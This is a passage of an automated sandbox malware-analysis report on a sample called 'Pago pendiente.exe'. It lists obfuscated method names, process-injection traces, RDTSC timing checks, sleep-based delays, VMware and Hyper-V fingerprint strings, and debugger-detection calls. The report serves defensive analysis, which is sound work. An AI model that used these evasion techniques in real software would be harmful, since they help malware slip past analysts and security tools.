          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, rMMxMYJxa9lPbCugfv.cs, High entropy of concatenated method names: 'Dispose', 'JOfMjer7K7', 'WVRY20O88F', 'eMveeCcEUB', 'frRMmCKFRR', 'idgMzItJqD', 'ProcessDialogKey', 'IyAYLx00SK', 'ynAYMybQBX', 'aSHYY09IUF'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, Ye8cD83ilgP4Q1dM8q.cs, High entropy of concatenated method names: 'r7ccAysw1i', 's2ockC5LHL', 'LKPcTAIniD', 'BYAc2ITeqN', 'RWRcnnxrfl', 'c2ycU56NTS', 'sL4cg6YBFM', 'qpLcW54Wsc', 'T7lcPhWTmD', 'T9ScCVDb94'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, IQKgXNAjhiaS4o0dDr.cs, High entropy of concatenated method names: 'yBrJKZ4sdF', 'aHMJljN128', 'SkkJtE58EK', 'rH0JyBnhWo', 'FqxJh5MKZI', 'VfGJvxZTcy', 'pPYJQlQ7hO', 'I8NJidQ8w0', 'eLEJjFS28b', 'bPLJmAND8K'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, GDVHnCd8e4hct1HQKy.cs, High entropy of concatenated method names: 'RcEu8Gup93', 'jDhu9V47tw', 'nNduJMVobt', 'rLnuriQ63y', 'VGsuDPnL0K', 'tVMu6VYJLB', 'A5KuotME0x', 'G01uds6eG6', 'QuDuF8TjKr', 'WisuORrG7Q'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, AXKOa9YvYah2ILJNRV.cs, High entropy of concatenated method names: 'rydSsc1G5', 'VUPXxX8LA', 'Qfl5ewpkV', 'QkERYAgBA', 'on2kEUkGZ', 'z1WN4QuSw', 'N175s9bHombUWO9Oth', 'ATc4RvVGSuVbIix8lM', 'IXN7PXEZJ', 'rdSVRMTAQ'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, AHoIF0TeuJQfgUnWf4.cs, High entropy of concatenated method names: 'irZ68JCcTg', 'YWl6JUY4OV', 'GwP6DIM2FB', 'Dam6o7pwZv', 'S1G6dO7QKA', 'dJADhHqHw1', 'a6iDv8SqWs', 'CfWDQgDPG1', 'JotDie8pdE', 'O5QDjLSd8E'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, HPe8TuMuoArV3iWmnaG.cs, High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uIjVKOptQe', 'yKPVlv5DUh', 'PdgVtCh4ke', 'kwAVyFJLPP', 'hkuVhtg9Dm', 'VKlVveExIS', 'PflVQp4i6h'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, hUIdvJzp3hSwOD6Knr.cs, High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'l4ubcMiwUK', 'VfBbB32Zwu', 'cufb0fWrSy', 'kVlbpgBB4b', 'jmIb7voSKk', 'euhbbS27jo', 'QQAbVYep01'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, cyZmYlkmRq3rAqHw2h.cs, High entropy of concatenated method names: 'TZUrX95S8N', 'Ohhr5rP6rX', 'aiBrA62GJb', 'hVSrkgyt31', 'txSrBSkhAt', 'TNgr0393Xf', 'SbGrpEGVto', 'brxr7JeAuD', 'NlVrbvaEZb', 'RxDrVXFGx6'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, Cv3u2mMLqgVyop0G1AN.cs, High entropy of concatenated method names: 'QE9bwYLlcx', 'lFYbx8ZWHq', 'QECbSXGNq7', 'up9bXaaXRy', 'L2Jbf5gSnI', 'i26b5MNxtF', 'IPEbRZ6nZg', 'feLbAFLIyZ', 'SX2bkZB8WM', 'vZGbNpl7X9'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, M4qQq4G1UrG1lP8ZE3.cs, High entropy of concatenated method names: 'yqnMoQKgXN', 'YhiMdaS4o0', 'RmRMOq3rAq', 'Kw2M4hTpd1', 'rlcMBQyXHo', 'NF0M0euJQf', 'zDSt40cPsStBkEWNhs', 'YbGCJpH1L1Lx4m0ik3', 'i9WMMlK87V', 'X5FMuNCWaF'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, Fpd1sFNOxY2GMblcQy.cs, High entropy of concatenated method names: 'sTBDfZihnL', 'USEDRBxAHj', 'RhIreDRDPG', 'LaIrnBLx6j', 'bOWrUEnLaP', 'CYarHfEKWu', 'na5rgoqaWL', 'chgrW8aZPo', 'snGrILIsl5', 'cuhrPnjlWJ'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, x7wBW7KwVdGRUhw4G0.cs, High entropy of concatenated method names: 'BHmBPRL8nw', 'RpIBZ01ddK', 'IWQBK0QRp2', 'lW7BlGBUe4', 'KPFB2sJggf', 'VcRBeUCbxU', 'J6cBnFqXgA', 'DTYBUbFk0k', 'HW9BHgoWbE', 'gZYBgvhG4A'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, gRCKFRiRDdgItJqDny.cs, High entropy of concatenated method names: 'R2Q796ZjJ0', 'nGH7J1RSiL', 'cWo7rjppKl', 'M4n7D9PpUl', 'qY076f68Vm', 'Q5S7oPrHjm', 'SFy7djiqUW', 'DpX7Fsi2CQ', 'hO97OPJ947', 'sky74VCD4G'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, cX4ZgRg3HpJweDXnri.cs, High entropy of concatenated method names: 'uvOo9Flv6v', 'C59or7autg', 'pu2o6nkMlY', 'yyK6m3kqSR', 'TAJ6zgUuBZ', 'hXfoLttTSi', 'eXxoM62lBt', 'hAOoYkeKgm', 'SdGou63t9e', 'w0MoGvcpUM'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, G3nNu1yLLZWCVb0s4T.cs, High entropy of concatenated method names: 'I0epOVONQy', 'U5wp42Kpdw', 'ToString', 'Gkgp9AVYmT', 'bdypJPZiGi', 'WWFprCO0mW', 'ecVpDSJPS1', 'MTrp6kLwKR', 'jhipoLFcxT', 'QxapdnyfIX'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, Dx00SKjxnAybQBXMSH.cs, High entropy of concatenated method names: 'K0n7TAD3YQ', 'jBa72rbjiR', 'BeB7eVO3Pj', 'AxG7n4qmbF', 'uLp7Kdq7Fk', 'z2g7UnZ9Eq', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, Mj6eLHr9Gfok1X3SWR.cs, High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'gsRYjndp2q', 'R5bYmWxL1B', 'g9gYzAOCnp', 'CtEuLqr905', 'We3uM0cMgf', 'ExiuY7YWrV', 'iCLuuAajeV', 'wQR1QxYiF46ddfUAkNL'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, JiUYX5IaJZrrF9fpAJ.cs, High entropy of concatenated method names: 'RyKowX41g1', 'zU0oxhhmtr', 'wq2oSV2sd3', 'NvQoXbyikM', 'FbHof9mDFB', 'ALWo5TqOAw', 'CohoRBr8Fh', 'tjJoAaNnKp', 'MQrokDwjcJ', 'qoRoN9tfQ7'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, FmJaeetirRTGV3GUfA.cs, High entropy of concatenated method names: 'ToString', 'bq60ClfX1X', 'psn02UaZq6', 'VHO0e9q9o6', 'fFJ0nbCFsR', 'xjd0U58dlC', 'sAZ0HDeoAe', 'sox0g7Bv8w', 'NF40WmuXuD', 'ePd0Is7qtL'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, ifpL5MvflcOluxXgWa.cs, High entropy of concatenated method names: 'cV7piNaiMo', 'BxepmnLu6c', 'yjq7L0FqN2', 'GlD7MGNJvi', 'gbxpCDRT9N', 'qKOpZaCMop', 'rPPp31NpuZ', 'Nx1pKOH96S', 'bSJplEqxLd', 'FqWptCqVYD'

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Users\user\Desktop\Pago pendiente.exe, Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: Yara match - File source: Process Memory Space: Pago pendiente.exe PID: 5824, type: MEMORYSTR
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe - RDTSC instruction interceptor: First address: 25A9904 second address: 25A990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe - RDTSC instruction interceptor: First address: 25A9B7E second address: 25A9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Pago pendiente.exe - Memory allocated: 3130000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Pago pendiente.exe - Memory allocated: 32D0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Pago pendiente.exe - Memory allocated: 52D0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Pago pendiente.exe - Memory allocated: 9840000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Pago pendiente.exe - Memory allocated: A840000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Pago pendiente.exe - Memory allocated: AA60000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Pago pendiente.exe - Memory allocated: BA60000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Pago pendiente.exe - Memory allocated: BF80000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Pago pendiente.exe - Memory allocated: CF80000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Pago pendiente.exe - Memory allocated: DF80000 memory reserve | memory write watch
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_00409AB0 rdtsc 5_2_00409AB0
          Source: C:\Users\user\Desktop\Pago pendiente.exe - Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 5983
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 3765
          Source: C:\Windows\explorer.exe - Window / User API: threadDelayed 9744
          Source: C:\Windows\explorer.exe - Window / User API: foregroundWindowGot 874
          Source: C:\Windows\SysWOW64\control.exe - Window / User API: threadDelayed 9840
          Source: C:\Windows\explorer.exe - Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_6-13933
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - API coverage: 1.6 %
          Source: C:\Windows\SysWOW64\control.exe - API coverage: 1.6 %
          Source: C:\Users\user\Desktop\Pago pendiente.exe TID: 5644 - Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2412 - Thread sleep time: -6456360425798339s >= -30000s
          Source: C:\Windows\explorer.exe TID: 4536 - Thread sleep count: 197 > 30
          Source: C:\Windows\explorer.exe TID: 4536 - Thread sleep time: -394000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 4536 - Thread sleep count: 9744 > 30
          Source: C:\Windows\explorer.exe TID: 4536 - Thread sleep time: -19488000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 1632 - Thread sleep count: 131 > 30
          Source: C:\Windows\SysWOW64\control.exe TID: 1632 - Thread sleep time: -262000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 1632 - Thread sleep count: 9840 > 30
          Source: C:\Windows\SysWOW64\control.exe TID: 1632 - Thread sleep time: -19680000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe - Last function: Thread delayed
          Source: explorer.exe, 00000006.00000003.3096752770.0000000009C92000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000006.00000000.2020705290.00000000076F8000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
          Source: explorer.exe, 00000006.00000000.2026275554.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW0r
          Source: explorer.exe, 00000006.00000003.3096490276.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000006.00000003.3789657905.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: NXTcaVMWare
          Source: explorer.exe, 00000006.00000003.3096752770.0000000009C92000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000002.4448347462.0000000009B41000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
          Source: explorer.exe, 00000006.00000003.3095397354.0000000003554000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: VMware, Inc.
          Source: explorer.exe, 00000006.00000003.3096752770.0000000009C92000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: VMware SATA CD00
          Source: Pago pendiente.exe, 00000000.00000002.2006572080.0000000001341000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000006.00000000.2011068724.0000000000F13000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
          Source: explorer.exe, 00000006.00000003.3095397354.0000000003554000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000006.00000000.2020705290.00000000076F8000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
          Source: Pago pendiente.exe, 00000000.00000002.2006572080.0000000001341000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: explorer.exe, 00000006.00000000.2026275554.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000006.00000003.3095397354.0000000003554000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000006.00000003.3095397354.0000000003554000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: VMware,p
          Source: explorer.exe, 00000006.00000003.3096490276.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
          Source: explorer.exe, 00000006.00000003.3096752770.0000000009C92000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
          Source: explorer.exe, 00000006.00000000.2011068724.0000000000F13000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000006.00000002.4448347462.0000000009B41000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000002.4445926904.000000000769A000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Process information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Process queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exe - Process queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_0040ACF0 LdrLoadDll, 5_2_0040ACF0
          Source: C:\Windows\SysWOW64\control.exe - Code function: 7_2_000669F5 IsDebuggerPresent, 7_2_000669F5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014C4144 mov eax, dword ptr fs:[00000030h] 5_2_014C4144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014C4144 mov ecx, dword ptr fs:[00000030h] 5_2_014C4144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_0142C156 mov eax, dword ptr fs:[00000030h] 5_2_0142C156
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014C8158 mov eax, dword ptr fs:[00000030h] 5_2_014C8158
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_01436154 mov eax, dword ptr fs:[00000030h] 5_2_01436154
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_01504164 mov eax, dword ptr fs:[00000030h] 5_2_01504164
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014DE10E mov eax, dword ptr fs:[00000030h] 5_2_014DE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014DE10E mov ecx, dword ptr fs:[00000030h] 5_2_014DE10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014DA118 mov ecx, dword ptr fs:[00000030h] 5_2_014DA118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014DA118 mov eax, dword ptr fs:[00000030h] 5_2_014DA118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014F0115 mov eax, dword ptr fs:[00000030h] 5_2_014F0115
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_01460124 mov eax, dword ptr fs:[00000030h] 5_2_01460124
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014F61C3 mov eax, dword ptr fs:[00000030h] 5_2_014F61C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014AE1D0 mov eax, dword ptr fs:[00000030h] 5_2_014AE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014AE1D0 mov ecx, dword ptr fs:[00000030h] 5_2_014AE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_015061E5 mov eax, dword ptr fs:[00000030h] 5_2_015061E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014601F8 mov eax, dword ptr fs:[00000030h] 5_2_014601F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_01470185 mov eax, dword ptr fs:[00000030h] 5_2_01470185
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014EC188 mov eax, dword ptr fs:[00000030h] 5_2_014EC188
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014D4180 mov eax, dword ptr fs:[00000030h] 5_2_014D4180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014B019F mov eax, dword ptr fs:[00000030h] 5_2_014B019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_0142A197 mov eax, dword ptr fs:[00000030h] 5_2_0142A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_01432050 mov eax, dword ptr fs:[00000030h] 5_2_01432050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014B6050 mov eax, dword ptr fs:[00000030h] 5_2_014B6050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_0145C073 mov eax, dword ptr fs:[00000030h] 5_2_0145C073
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014B4000 mov ecx, dword ptr fs:[00000030h] 5_2_014B4000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014D2000 mov eax, dword ptr fs:[00000030h] 5_2_014D2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_0144E016 mov eax, dword ptr fs:[00000030h] 5_2_0144E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_0142A020 mov eax, dword ptr fs:[00000030h] 5_2_0142A020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_0142C020 mov eax, dword ptr fs:[00000030h] 5_2_0142C020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014C6030 mov eax, dword ptr fs:[00000030h] 5_2_014C6030
